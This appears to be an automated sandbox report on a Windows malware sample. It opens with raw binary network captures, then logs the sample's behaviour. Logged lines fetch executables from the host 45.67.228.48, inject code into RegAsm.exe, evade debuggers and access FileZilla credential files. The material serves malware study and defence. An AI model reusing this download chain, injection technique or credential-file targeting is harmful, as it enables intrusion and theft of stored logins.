sÚ.|DO¥-×,úyWÉÍMlefëÐþä,N%#5AZœƒ¡ÿc0‰¸) ?=,`كIjÁÃ¥±¹k_ô©(ÒX·9‘P»ˆU¯r«UÄi›\֎%5¡*àâ±Ì@ï˜mÍí–x#ˆs*ÞSÆK«­Û­œØ]=ƒÏípMÍà8ªÆuÏÒø¤g~#䁛)ʂGŠeP­¿ÆÝÙòŸ‘Vx;™dþïx?‘ õ>¢*GîHuá`ÍÁb˜I`\bÎlÕÐՖ0á‘ØyVú I 4­dec(_5¤tªÊ¾ø¬]c©*×¢3pôøˆ.OÁQ5ô¹ýÌs.¥ið£¥x¸Sj €]•’¢ÒF„x‚—ÄŸëuæ´˜®½¹e5îr¯ÆöM«¶ÞŒåžkËl¼òk÷Î/aëodÃÿ…ëŸaþVÉö<'Q1©ÔÙؙ½á“%ÅÖpm¸ˆ£‘"¡Y™WfËù—‡ùð:Æ–Ud$m3ô²…©­A ùÞ¢CȔw0¹«ËžO ¨nûJ[‚ÖÖae Ü1íôTù®Ò¼o#µÌR³(++D€>Ö,ëNæŠÚˆÌ‡¬Ú @÷ú'îþf´‰¬Œ¿ëð ‘0è懖mï@•^,#2ÄGØåƒáïˆ÷+ýA˜ìÉ}/ºªÅQñÕeq"ƒÌÆnn¹Rˆð(†Ið}Rš¤ýaGM<#*¸ÀV:Ù¯–›ˆ{Àmõ˜?ùËÆ>´íšMö€°Z²ÁrZúƾÓÍ$"evýQ
Data received hìº=Y8 vA6._&Ñ.’e“¶¡­ù`ͤ™hùÜÆ0c˜}R›1•x®oâWæNCá$bFèÊ8u}«\ÂãÆ¡Vî›m¸¬…ÝxÞ  £c}ýëBX_l§/”{‰|¹±©h ˆ ôÈm‘XjiîY6¹…¦ù{x‰ ª¨4Õùȵ‘“½åÌ£}ûœKùÉÕ<ÞYþkwf¬ýÍ p ¦pÞOö?‡¸R¥¤Â¬ÄŠãÀÿ¯qœòeåÿ-?ü2ˆ.±‘S.§ª“ÜçëýšWVѝZVm¢ì˜²tAgЭƒåf-Á[–¬;±[.ק“!§ÓÔ" ¯»aî™2dLDÔ&Ü&w\=8ò³º ì鱪‡¯^ärtˆÐcv4÷þ‘óð.QG+´ÎP:Q T¸OßT–ChZ•á«>EÙU,O§4׈’HEëÔILƽÁXòDÜ'MiÐò¬)æÕi‘ÆêpÝ(¼<l/‘6Í·”“R±>;áfPD‡Eü¥ßc05³íV˜ì ÃÕw%ÔèSnŸˆ÷B§MƒøÕ`àV¼áݦ@ÀÉp{xî7~µ/‡Èœºho%¥~!ÏLyüƒñÌoʕO1u÷õA&ñ…ÁŒ¾œ"AÿéíÉá™oÊálrŽ<^ !ÉY„ªô‰sd-l´èföà#UÑ®{Ø9t+E!¤D^KU+YSޛl€ ñdÃç`š€aNSaµ>–ÿx³˜Xã’1S½>DONå3a}CLœu²ç¯úU)Ã6M,¥6§‘åÛBè{a}eB•9Šì“X½CÆ«>M ¤(Àþ´¹jíqÏC”ö¶ ƒüxúÊXÁÏý–„!®:?بUÞ©Iºopy¥•®øX1)¼K|øI+MÞÃðÂ#yÿ—‘}×Ëz\„ ò´û゚ݱ¾?ðEW»–]úá»ÊN™a¾8&| Z™9ßøHŠ ãöܧ™c ^ðV¥]íqÇÚ RÓ¸oIœ«u!z ÇÝÀA¿|Ý ’n•þ«_öùŒ>c~’¨õ@Éq9 Åûw°ãÂý*SÏÿ{qÕÅê¦÷KkÁŸ–h4mCÇ»Ùß$é:ZŸ8śJrI³KÇõ®Þ'hÄ`,‰xwò!gSÒoââ$%¾w)¢Ç ºJ'uÐcNb§ñœ‹öTü<—«4-ºå,´ºG„°²Ì„Âj!ð›¶Ø³«Í™/yg<Á…r4ˆi‡×xN¸æ*!.ò¼[{ÀÑ?ö[ù¯ø¾¯ôX^B`|çY ö¹/°0½¿:üDYù¾2}VÅËSýBÂçHY6â‘D€GDZ9Hð6¡$ ¹êì³Ìì!Ë 3|Nío — ¯‚¦<ÝçÌ_KØø‰XÎ9¾ŽãN·Ÿs,W¿‘¹$T—´ÅÝXˆç‡8& :£ªˆ\· ̝Â\}©…úàÚr6úõ4C—‰ WâUiò³qm³hߪ3Í»{Ë]~˜ø)"†D¯7ÿ¤ a쪴õpB×|v·tÖ­vO<ÖZ× ÙÙ×ô—ª›'-^“¾ì AD¾ùeÁ„ WƜmÿ"½#œ‡‰ ²KÐ%u ¢¿ ò׆…ªýHÕµ”Ö;N>@YÀÈFÏížÓM>¬\‡ñ;uÌ&¨qFyýçKréŸÁD†Qî9ɝÝË¿)\T„¡t hüý&Ø[Ô/’À¼ëUÿçï~ªa9\Ntà4:­<aÇö[N 5|PDÔ’Ë|єc䶟½X®'Þ×øãðVŸtáÄLi"ÎyfL¶Ð~¬›Æ ¶œþ$C=«Q€ÓaԎÇýI£ßÛÌÀ§aw Ó4ò8ãQ™7&Î=a¯½ §0´©sÀµÒ†£ÿµY½À¨sNìïÒãIÛŠ{˜tðÄ㱓ÛÔÐa «ÅCT¶³H+Òüà€2¦þ·1æ’.kÆ&5ޖRú€£pUØëj.B´IàoÏì¢ÚnŒ)‰WŽ©«9 e­áùމ£:¬ÒóÑ J©ˆkpR])}ŸâȖ¯HÝTkÉ戰B4Ç.èÔšæã²@”¹mf¥<ùtÝ`£ Ž](y°È¡P©ë(£ÿ„Õe’ áàiõ"Ëhï+ú¶YKbf"Wak Þ3ÏpB*E¡®ŽÛëø)J|5#¢µ÷…kçõcn¶[E‡`RÚíHÖÿ£`^=QpN险_o­gÎêF8ԕ4eÿ†ÙBŸÿðK°s-,¼«®àK0j%ßWÀ]÷qbÅT¬¸éeiÒÙù iQ¯þtùxt…}ˆ†|¢OY ^²H)ósýÎ}ç2á´0zàÈ„±Þ«ӔÊ(¥÷–9ÿSǀ¥Úãà»÷×âã¨iݦ¡¸5ûö•œ(oí8i$2„ “ÅHqP ͐Ïù?þ7½nz±ÌrË-Qm!ÇxW¼‹cVÀÊ{0ű¿lè ô*óx’P³¿­q_[jDÙKCœäUê­¹ŠŸ®tkæhüTÔ¢pt¡-϶îC>QØîԆ`©åQ²¬Ê¤Àìaò ÔLQu%ÒRìå+»¿Ã’,ɯ˜œq§I6D¤‡¤TÖ®>¦Æ ‹BïE6æ«ï^Ž1ƒ³íMЋ¸HÛ¿sÚt<˲ŽibØ (H•ô9S|ÛóÄÀ)³lìt[×5Yh“S?L#ŸÜ§ÈÆOD‹Ð|DÀ¹ä ҁMîeuƉ`±^˜Ïe«Ñ+×Cv -òItµn&;ØG3²ßaN›Çpä—`³ûL3_†Mö%j®<Å3òwδN‰ÝȘ×É"ÆEIè Û`Oµ+îó²Æ>h—;Ï Øî )]‹KÏE×Q*¼ÆP§bîVð.#E%æ™Ø>ÜKû‘klëaêŽßhˆŒö…÷ƒÂ>O(À7T*†}ÇqM±M¶£€÷öÞ?…œr]pvț"ÃYõO>‚vÍs([¼}Dœ™Ç Ã,äí{`º"¡J=0!R9@Ü ¡é=Ÿ5i§ ×ĸšõ`Q (cw‘jÆSÆp¥sM3H£’ ¶e•òà˜å`ït©»Ëáô%»BÄOËg",¦\»ß¹pý÷ix»!BŸ·Ù„*Ûa° cؔMEñxÏ~]Ì(âv{-§îoù ·þÙô»˜…þ”YÏp]ÀÀ[âYà<e·F$Rò=&ðý×j$'Aû˜²ü SÛ[ÙÒ ™ÅQ|†›ú5k’ƒ¢%8–í7­Ô7"PNMB_ÙÔA)”ð¶mҙ®æ[YE¸Ô z¢‹ &ŠÒt˜1ªNU=`qÜÿ拧Ñ2µ-=r7÷«f¹ÇŸ#Z͏zÏÌRÞü¡“¼&DâM±»ûÖ5iJQøeÝԟ-µÂÔ V÷õ\Â{á.kP7[KGOpõ EÜәèžS1E…'sG”é1¯9@?¤XV¥‡ã±Ža<Ð3ìh¢ªýgêÁY¡Ü”u­&þ<Sh#êo5à¡à™Vƒ_—Pt¶ÍaªÝxæøÝiÏ®’ꋳ÷W+z Ú½Óù‹î£ =T˜¢KJˆ³ç·õYÊõ}D Aâ¨î±n-öÔôtV'DÃô јÈfí}ÈÑ*·+θKßa@¿ÁUŠW¸º—3ÿ´ã•éHM×Sr. äâúï"JŽŒ\Ï43¯O†5ŋè–nœ·–¸…®<ÝÎÒR°e¹Pvê
Data received ˜f°ðDlÀD5éx{c:ˆq–%£ð&:`Â}Ìuv/f.˜Œüc(‡8‹6ÉW™SütKeŸº ] ±BB.(ˆ5L¨„Hè‰>ú1iry ìv€ò@YØ1û;ñ¬]ɞ±ßî³»¨Ž®C…7ü!žØà.ҁó´óÌ{l.çL¦<ân4íbœKª¾=fʹ =HÔ—"Á,8WS­Ü–ž.&ûºÕ¯›9)ï5gÕª³€t5@!”ëqô0Ç*­‚Ùn.C,*áwk£ô°'h ¸Å;ĬÉòè­l…¨n”°ýÛ·Htg^ôP€©2?N¾kaÛ«MeqEô½IaÇ_Œöéád•càíæq_RrUÈûþÊuɍ\r·ãW )9ÈÆO÷VT8[öIï½ä*Ïä ëîèòfÓ 'Væv²·e8’:®Æ¥UH‚—nm#ÇH;[Q„ð(;ïÊ8L¿|Ž |õ™MçOð™â+a-¯cŒp|6ïúAÛN¯Í‹r÷%k£ ÞYhgY*Êt0ÇóçÃßwôiþ"’ØÉsŽV•!¬ã[×Tv¤e³gË3ZìšÆäKÈ5úiõ"¡Ud¯”Œõ¾(Ç.ÉÛVÍV·Ü´@ΣPú ,gS߁¯ÛÐ\ñݼö>b5þÄvîòOßmmƒGíê8€°““äU\«1ûI5nÁ>nL.cMÂfØWæpwAÆmΣêòë£D§¿õyîJ-© àk¼ò€×‡­ø¢àŠ¬âfN_zPœôÂXK \ÄP°S'÷òõ6“Îì+Œ¤ …™ÛB^™¾,P¸ƒ ɆBÔæëì îô 9<|Žk+0¸vÉO3Ü_³bXŸ7Ýý°–¦iã$Æ®0ÞÀŸ]©å#öɰ˶˜[žÐPÀ³Even•A«2þù3yÿÔÇ´ 8ìþb0äÞ®!N›Y=:ªC換¢‡ff­Aïügð€ˆYÿ Üõ +Âp.(GÆ^Êõ´e ¿% “mQy²CHXä˜z@œMPÚªvŸ‰Ìµ>ÆÇ¿(zí…ßö85c΀Á$Ý\°Êþ琢á^Ã?°ž|ç¢ðnÔ[…·ä¤dŽQÀňʬ ‘¸( ÞǏr|$@¢ ƒ˜|¢¯ Ò1#9/œÜÊiÀɈªcÅEŽÓk'ŽlØo$¨QÈë^‚Ž-ԐïÃoïùw˜¯PàWœ\o+‰ Õùâ4àå«æììDbVºñ®p/ÁÊ$ƒp#³àF™¨A ÎË Å ˆ~®Á9ωÿmgKr¯æz©T¥7#O‡ˆÈ†Lµâ+Öå×û`š@֞KNn5#Z¥ÇZ¹l²U„匦¦ÉÇñŽüAQ!x#‚J¯§U$`úÝÓFÈ ]Ô´’‚b[Ø]ÙÙóTÕ¿Vï {CÓ×ì”,¬jª¦è‡Ãn•ŠÅrÀK‹ ‹ M îÌý[Õ\³¤jDžfòWƒ•]tq>pªï¨ò<ɲm.s—‹|‚²Yžï´/*•Mù-ûº#Më68‡ß죁a·ØºNÙ&ö´RøÒpba~!¼7?]"¿‰ÅÝÁ}£ïJMwsè7J¯–ˆ†¸vGciköj<D„˲¼@B’é Œ‘ã‹Åtb¯ ®6è`=>£~ٛ>Þ.Í @¼ââ“eéL°šjþÖ.Xʦ¢¸ŽœÙZÊŠ¯Žà Hàì<nbè7Ο#/ó»Çrzâ+Nóä/´àÏÈUê³þØ[ÛnÊêŽúÍì6¶Éö™o¦ŒòpÜ7‰Qô£j×Àæ‘!ËΩ1Øøb&ScŠmòžk3‘ åR» M€B‡J].áOçí[HۘyÖ/˜ ~½z´5ÌÒr–í´ú.‰M؆ûÃíþ ä4>ð:ü×£ËQô¦“®&×'19 —+ƒoÄ$âðUN\û&æ Ó å< /¨ùVOL$ ªFL`ç~{'†u˜nRpZÒx_²X‡ßš»}¢ 8¤¦¾ú61ή[g{Lj¶#CEÚÏÃM•!µÑG§~‚í`–ôÙ}쯽©¦ïN†Ö”ÿ‰À6'þx[äEéÞ(ÿÙ"OYäNáK‘û˜T•Øøt¥@mÅ'ü9áÐô‹áv¬?fdÇÞ@ÀŠÂ¸kúÄÏÑjˆã[ ÄaxàcÄ®±ß±)lSÀAmÌjgò~务¾”F) :d†yçæú«Åf}æ ÀÉ&ñ²ž9”[P5w§^žïM6Dõ‘ñœþA @L(qÓHpÈé™3û]øÈÞÑ-3Æu¤Ë\õŒ}m?ÊÞ7â„AæaíÜý¼Å«VË^V<QÔ« /§íø<&&siUf"ä+ⲩîÀíF›tHöÊrQr åNDGp,°KÏ»ÔTwÁå›v؛½×‹a ØOY`¡²Æ%²ÙÐ!§ñ, rÿ¢@^üaR¹ÿt”Ÿ[œO|À&Y!‡ñ‹Îu -ÓoÉ)O _C&vx)¤‚¨ÀBÒ#|±Íè©*™Ë¼Kt õ߄`@Š…¾ `¯+ l›NmnŠ4ݸƢtÚÚýBÅé[üÏ·Ôë*ê¥FÒÐSG‘ꓱ ŒUT ),ÚD¸ð¹pS¦Xá¥Æ¦Ò tLFjn€¡£ÜdàŽrÞm§Æ'éø«b©ÙbzV!®å¯"ÌÞy·û–ÏR*»lñùæ=–Í“¤íYgûácRÍ¢Ùh¦=ÝůýR¥JpÂÇ6·g5ɦ8@?Ý¾Ÿj¦ž¿çŠ݇¼8ÆÏöw¹ô>ñ@X ¢yØ¡D£Ѓ bt{¶AÅÒS@(UŠþÀÀÆÄ!;p¤TÉ.óƒ*x9ol>ÜMÇ%“>уµ}€$µ ñ%0Ræ-kn%^[i¡"Ýõ;8Ab, ^[(Ë^{=%GþQ`w~S²»äð|3Á™‰ ÏÝ%ÐsÌ"ñ e`íÓËÝÝu­¢Ì³§¤$ˆ8àd§ù³ÛÃØVV,à àj¸zÔ²TÀ.ûMÄgAÙ}÷íΰZþúUŸkÙÓó7¯2J1Ãî}$fÏ[x8 PQ‘yöû§8]Ø|'3Ø i°? ®#Ûy1ïQ$gÙ´³-â( èI§[^‹úe»“J{û'ƒ`åôº` å„òI˜˜ªuŽ믖î0܆á¼²Áªõ’´K”:Aü´"âR#¾¹1>§~†f43¯•5²ÍæEéåw–ªA‚ Tˆüü’ã\ÊBÒ3A³üÌY/5/N¬37À™,iM¼çL»i£ hðgºÕo¥a!:ýîÉ+h™/r!ñ(­vÄ,ÞOBlÓóo»ˆÿb|ù© wÑm™j ¡.¥ ¥/þ¬¤õ›·2±ke ÀÿŠhéK_عYi«Yåôr {L¦pïÿ=À+«–= ꢑYÔ9™Í1鸯IâBñ²yÄÇFþKz—ªôSÕA²M±Aö:%²|q[ Á(ÖÃ,¾o.^>(|`äÛ͞8ÆM¦à§Iïãâ”õÇ:^k¾Æœ/ryR¶3À’úÚAcôœœ«âéߐÛ{Ɯ„¥9ÀæÛ6tÅ, 0SîØû)‘èy*…¿Ïþºé¹‡úp.¡¥õœUÎÎZ«³îÐSÞä÷ Ÿbz+d:¼Rk+3T.иœ¬sQº¡4[Õê#P˜Àꢇ޷6ñ±ý¤Ò[V,
Data received jœŠ”Gýó;óR `bxT ×»ÜP¬ëùfU;—L%,š÷O——¥‹6E ©~¶bË7ò @„¯;cÏa­åöŒ¼wç–H)F‹9÷Ÿ2•æ¿@ÔN;9n£ÿC{k^6ÆüÞ֙Vþ·ßؑ„²XdeÈm’¾¡¡~ìT=?(c½~£þ—Wr°2L¡bïÞÓÁ ž‡wSÌ©&ö&`’*̦.ÿH½4®,8>³l5Þ`Ajœÿå0à"i]kMI\Ô¼˜>ÁÿŒþ1{FX²{‰»à{ƒžz NK3ä/zlõƒ0xc­ûø¯J’Ëga™²¼©xI{ýRÃ(Ã>Ž%¡W² <¾7I»xúhPï\!æº1wÉDÈQõ0VRÞ#;±ÅljûÑFreÅ´:‹"šÈ]bê nt“ÝÃGó±jñŽàA,-²&f’c'ùϏën} ‹¾ÉZ¯Ù¶?AD¸‹åèëcfû£“$+ѯPÇט)¬›.ÁúÜ1Œ¸Ü*Ip-·$yÛ§$äŠEjàÐ眥ù2ó·…Ð-$¨ÿ~¶ìÃĖÜ#r“(Àúd+#×smÛ\&û@ÉCÓñ1•4bàúÉ6[bEY†¬×•BMQï×,ÓHKnƒä Ú±-­A‹‚Ñ”ôª!sÞ´oå"+O™Í%3_]ôf}›½Ñ ° e³¨>8HíÙÒïp‹vW>¼±^Wo†ýžø×®M- W&õ~¨ã]Y#§,åê·£{K$,ûh}í"f#ÁôîÀ l¬kÅ#)±×>mõRáǾ #X%¤]ë(qàQÝÄh~B˜ ’§¥c „t²xÜS¤ð'ê&4¥í*ÁŸ'¹\Éþí#ñe°ËQ³˜†¼vt÷½W zd§! ®r}‹Dd ¦éx·³è7 -n»lñ„÷5D–œñ¥a¼TÂf †\p8šM”Ð=¿zV'->»:%ˆ^K­å=Wy꨿‚7LB4—lÞEmÁ½Ìjêz£+“ŽänÀ"ëþ¼ä¥÷Ú9YS±\ëÇ\ªHÖ:I_öW°Ðz Ì…‰m@ýŠ„v炇Լµ°å Q&–§FògY§ÁžWÎzçÊBÊ¿'—”=Y”c9øÊb;éKçÎdd¹ç`$ñ…ÂÆ׃”Y)[òáß#F…‘/†„(2”?@%ô5«âz ꓅ã^s8Qà7¦§_ñu†RÊ# ¶¸¬¤Ø©}ÆÃÄ£ˆ}¦½#Àٓ7¡Æw‹8yÔ7‰Ï …IúˆÝ<=—×SÍ‰Éó¤;QÍDùÀÉž‘ËðÔ7YC†m®eýnO¬zДu, ÕW&€,uzKXS¨BØÌßÚÐÁ£ è6ÇMàÌ¿¹ÒÎ,‚»÷bn1 a &6eÍü<.<; ×ßAdÜé¯ïð$«Cew:4E£Ošaى—ô9±êAïHµ£§ÎP¶E\yr‡©²%4—Çùz\ɛީžî ¤ õÀ3ñz%ÓTÿí·¡£½N‰‚ëÑËÑ}±ÜSó}ii“ï=V*0?€üT©Ó,ïüDýûQžþ|=·›rÝ×÷Sm£€‹IFf¡/(…qǛó_tsBË»/ƒHCQñ.B’®ÖþN§¼Ä¯˜"kÀí¨¬l6º,áÆÑlš/äVkOºGÉ §©kãgOà´óž'rˆ}‹ŒbÖøû¨ëö¤’Q²#Z0þxUá÷N¢x¿Â['q]ºw´ålƒ?ª˜~ÿ:èî_Q¢´»xÑÇ`?zÒv¼FSƒ´~Á‡Ï‘í§ŠsfEi¡û.|%× .ˆŸw{÷'bó3ƒTí¡zð3)…¥×ŽÃ±kíp¨Ö=ôÉà+¿Ü¦½Âט,%UH¿)T逸ëini‘ÌÞ|Å.JØ.b\§•>Òä1©rƒu”k-¤XÀ·\>æTàضÃOŠaFH^^JÚg@¡žúÁ×r(£YXȾJ4Ǒ>Èåþ ÚjÕ=¼e!<³T¸3+?T]vÀïVwž%4\d¹ø>½üºù®Î”"••UFzè:NšL$òᕓ͡ ‡‰CÆÚ:0¨+¿ 彆þ$œmô´r¥ˆã„4D–ÅÖ8XbI Ȥ1@ÖÌDFà|¢†g/±|èÓVªV§5ø—7O¾¦$ҐW,t/Ü3å|£\ƒ3fi˜@œo›ºèmj0”×ã‚pk;§)‹Jjã´X8¶ßkJ‹ÔêÌL¬l×Òä}Û)pˆõWetS½6Ò8é¨ïñMÜL÷`ICK;GŒ‘% h%µš¹^d.9gGùޕÕHÿبk|ér—â3½‘¸,8š_=Oô^%'¦'‚ð2X8ŸœÙD'X[á^âÄç–îu5ê6ä "H›Û^©rò¨B*÷ú‚2H’™þN ¸> ·êÄ«h®iÆíÄy¿TQ óôÛ¢Ãaø?ëåˆ`d°„E÷ѨÔ5×?õr­(^lßč$´ÐZÕñ4N$>(l1¼ü7êZ.M<.6¼iފ+B"u¾›*8;ZºˆbUbƒˆFÞ{‰#þï€?b´‚ø çŽ>êEpAr0ÏtìÍPþe?M—Slيº"È/ Dð• Î\„D͐j²£ÏX2Cì<iÞ3Àrw27‡A]ÔÏCš.ÄÈp5¤1®3È hbñÆbÛC¶W˜Ãݤay'¶ƒ>›¤’”=÷x­Ý`´{]5ä†Ç¾Â «¬Ù“®E9©‡$àf$ô¥Cè’±;Ò&‹ÍâZ¡,ï¬oš_²ÅJž’†¯Z•þŸUäçn#Q6­z<5¼ˆ~±Žñ’ëÆËÕ~ò >8{P/fï+È.ì؈†‹ÓT ï9º©|dA2{§º=z ¬•Š½DÄkA{·°/oeÀ¾­?é ñåzßµ^x/ýá±`R-4¾;™jûÉ?„‰óù?ÿ**ý±G<;<§d¶±nscDp{Ù&‘ÌAâ0ÑJße›rùd™DÅ)íêï½Ì5æÅÂ2ŒÛ‚’nn͘žòª™ÈË~Ê­Qã~²¨XOiÐmhkؘˆJòϝý‡ªR8ƒ€|¸É<Ûg4©…¿_ÚLO }£IQ¤!¹¿ÌOðCa5 é>í»˜öNÖÓ*d…4IåVrꅎkæÊÉÝhö=,üI(_7kâ¥mTWª¿; ÊòòXüZLÝÙ²9È­K-­ø¥ý/]¥ØÁÄ÷\ôUz²à´%;œ@h·)nÙ%tq%ŒÆÅôúqºLlšÉؾ›XÑ># ñÏþy/ïåå©$v}cö'oí±â(œ´•?uœâ´dY{¸u ïÛåL "!Íp×Tí3MÑ çBÁ¹±‰âØJ÷”¥H•ö9,Zô/Q_Åz:¬D` tÞ©1¯†™x&Õ 'c­ˆº}(‡ü³ô›ÏrëÄ­§bó‰åò‰Écm‘ §YˎnåÊÆ££¶ºñž o%­è/ãd-¿ U¨®“Ìy½Õ͟Nººr7€ ¨¨ /mKЀ§ÍЧ/t·ø¶²vVxò1qÐ$?¼»[ÇZçvlMN[Е“ÿÅ×9?­–gž°ŒÍjì8V\«¯yQò—Å5‡Ø„É‹©™©w±ö«tMj“;ÁcZ·˜„ù¬ÄÈsʵ1oœé˜ª¸¢êO¥ý€d!²÷ۖ
Data sent GET /host1.exe HTTP/1.1 Host: 45.67.228.48 Connection: Keep-Alive
Data sent GET /system32.exe HTTP/1.1 Host: 45.67.228.48
Data sent GET /123.txt HTTP/1.1 Host: 45.67.228.48
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description task schedule rule schtasks_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 45.67.228.48
host 94.131.112.154
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 196
region_size: 819200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000254
1 0 0

NtAllocateVirtualMemory

process_identifier: 2580
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000024c
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description system32.exe tried to sleep 160 seconds, actually delayed analysis time by 160 seconds
description RegAsm.exe tried to sleep 5459935 seconds, actually delayed analysis time by 5459935 seconds
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
file C:\Users\test22\AppData\Roaming\host1.exe
file C:\Users\test22\AppData\Roaming\system32.exe
file C:\Users\test22\AppData\Roaming\123.txt
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file C:\Users\test22\AppData\Local\Temp\I8Z7Joxb0y.bat
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà"  7 @ @ € ÍÞ @…È6 S@ `  H.text$   `.rsrc@  @@.reloc `  @B
base_address: 0x00400000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: €0€ HX@ ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo040904B0$CompanyName,FileDescription0FileVersion1.1.1o4InternalNamelibcrypto<OriginalFilenamelibcrypto$ProductName4ProductVersion1.1.1o |LegalCopyrightCopyright 1998-2022 The OpenSSL Authors. All rights reserved.DVarFileInfo$Translation °
base_address: 0x004c4000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: 0 7
base_address: 0x004c6000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELú”F§à" 0 Ö> @@ €`…ƒ>O@` Ü=8  H.textÜ  `.rsrc@"@@.reloc `*@B
base_address: 0x00400000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€@„„4VS_VERSION_INFO½ïþ    ?DVarFileInfo$Translation°äStringFileInfoÀ000004b04CommentsMicrosoft incHCompanyNameMicrosoft 1989-2023: FileDescriptionSystem324 FileVersion12.6.12.6<InternalNameRuntime64.exeDLegalCopyrightSystem32 © 2023< LegalTrademarksMicrosoftDOriginalFilenameRuntime64.exeFProductNameMicrosoft System328 ProductVersion12.6.12.6< Assembly Version12.5.12.5$Dê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00404000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: 0 Ø>
base_address: 0x00406000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2580
process_handle: 0x0000024c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL„aÝbà"  7 @ @ € ÍÞ @…È6 S@ `  H.text$   `.rsrc@  @@.reloc `  @B
base_address: 0x00400000
process_identifier: 196
process_handle: 0x00000254
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELú”F§à" 0 Ö> @@ €`…ƒ>O@` Ü=8  H.textÜ  `.rsrc@"@@.reloc `*@B
base_address: 0x00400000
process_identifier: 2580
process_handle: 0x0000024c
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: GET /host1.exe HTTP/1.1 Host: 45.67.228.48 Connection: Keep-Alive
socket: 1436
sent: 71
1 71 0

send

buffer: GET /system32.exe HTTP/1.1 Host: 45.67.228.48
socket: 1436
sent: 50
1 50 0

send

buffer: GET /123.txt HTTP/1.1 Host: 45.67.228.48
socket: 1436
sent: 45
1 45 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Wed, 26 Apr 2023 22:41:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 26 Apr 2023 06:26:49 GMT ETag: "5b5c00-5fa3753317e9a" Accept-Ranges: bytes Content-Length: 5987328 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL–ÀGdà  Z ÜÄ! € @ À[ôÒ[@€:€ P€ ØØ ` Z  `.rsrcØ؀ Ú^ @@.reloc ` 8 @B.imports € : @À.themida N  N< 